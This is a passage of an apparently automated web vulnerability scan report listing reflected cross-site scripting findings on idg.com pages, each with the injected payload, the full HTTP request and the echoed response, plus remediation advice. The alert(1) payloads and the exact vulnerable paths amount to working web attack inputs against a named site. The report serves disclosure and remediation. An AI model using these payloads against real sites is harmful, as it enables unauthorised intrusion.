Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5050
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?OpenJavascriptLibraryd323a"-alert(1)-"85f83ae81d0");
} catch(err) {}</script>
...[SNIP]...

2.188. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45fad"%3b0d45e48607d was submitted in the REST URL parameter 1. This input was echoed as 45fad";0d45e48607d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www45fad"%3b0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www45fad";0d45e48607d/homenew.nsf/ajaxroutine.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.189. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbe20"%3bcf8c8614847 was submitted in the REST URL parameter 3. This input was echoed as dbe20";cf8c8614847 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.jsdbe20"%3bcf8c8614847?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5040
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.jsdbe20";cf8c8614847?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.190. http://idg.com/www/homenew.nsf/ajaxroutine.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/ajaxroutine.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efb80"-alert(1)-"77dede8c335 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:36 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5031
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/ajaxroutine.js?efb80"-alert(1)-"77dede8c335=1");
} catch(err) {}</script>
...[SNIP]...

2.191. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72f0a"%3b5f984d36b94 was submitted in the REST URL parameter 1. This input was echoed as 72f0a";5f984d36b94 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www72f0a"%3b5f984d36b94/homenew.nsf/awmlib2.js HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:47 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www72f0a";5f984d36b94/homenew.nsf/awmlib2.js");
} catch(err) {}</script>
...[SNIP]...

2.192. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8105e"%3baf69c63e062 was submitted in the REST URL parameter 3. This input was echoed as 8105e";af69c63e062 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/awmlib2.js8105e"%3baf69c63e062 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:50 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5014
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js8105e";af69c63e062");
} catch(err) {}</script>
...[SNIP]...

2.193. http://idg.com/www/homenew.nsf/awmlib2.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/awmlib2.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b033"-alert(1)-"ea5c4a653b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:46 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5026
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/awmlib2.js?1b033"-alert(1)-"ea5c4a653b=1");
} catch(err) {}</script>
...[SNIP]...

2.194. http://idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of the OpenJavascriptLibrary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b2f"-alert(1)-"90698c058cf was submitted in the OpenJavascriptLibrary parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5043
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?OpenJavascriptLibrarye7b2f"-alert(1)-"90698c058cf");
} catch(err) {}</script>
...[SNIP]...

2.195. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75c8e"%3b12e2645e466 was submitted in the REST URL parameter 1. This input was echoed as 75c8e";12e2645e466 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www75c8e"%3b12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:29 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www75c8e";12e2645e466/homenew.nsf/core.js?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.196. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6452c"%3b772900484ab was submitted in the REST URL parameter 3. This input was echoed as 6452c";772900484ab in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js6452c"%3b772900484ab?OpenJavascriptLibrary HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:31 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5033
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js6452c";772900484ab?OpenJavascriptLibrary");
} catch(err) {}</script>
...[SNIP]...

2.197. http://idg.com/www/homenew.nsf/core.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/core.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a779"-alert(1)-"d0b5380c266 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:37 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/core.js?3a779"-alert(1)-"d0b5380c266=1");
} catch(err) {}</script>
...[SNIP]...

2.198. http://idg.com/www/homenew.nsf/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 848eb"%3b58421c6c63c was submitted in the REST URL parameter 1. This input was echoed as 848eb";58421c6c63c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www848eb"%3b58421c6c63c/homenew.nsf/home?readform HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www848eb";58421c6c63c/homenew.nsf/home?readform");
} catch(err) {}</script>
...[SNIP]...

2.199. http://idg.com/www/homenew.nsf/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c700"%3b5ea31e5fe23 was submitted in the REST URL parameter 3. This input was echoed as 3c700";5ea31e5fe23 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home3c700"%3b5ea31e5fe23?readform HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5017
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf/home3c700";5ea31e5fe23?readform");
} catch(err) {}</script>
...[SNIP]...

2.200. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc373"><script>alert(1)</script>63b78d5c0f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www/homenew.nsf/home?readform&cc373"><script>alert(1)</script>63b78d5c0f5=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:21 GMT
Last-Modified: Thu, 16 Dec 2010 13:00:19 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html
Content-Length: 15450
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IDG.com: Home</titl
...[SNIP]...
<input name="QUERY_STRING" id="QUERY_STRING" type="hidden" value="readform&cc373"><script>alert(1)</script>63b78d5c0f5=1">
...[SNIP]...

2.201. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/homenew.nsf/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7c1b"-alert(1)-"52c0a93e1d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/homenew.nsf/home?a7c1b"-alert(1)-"52c0a93e1d4=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
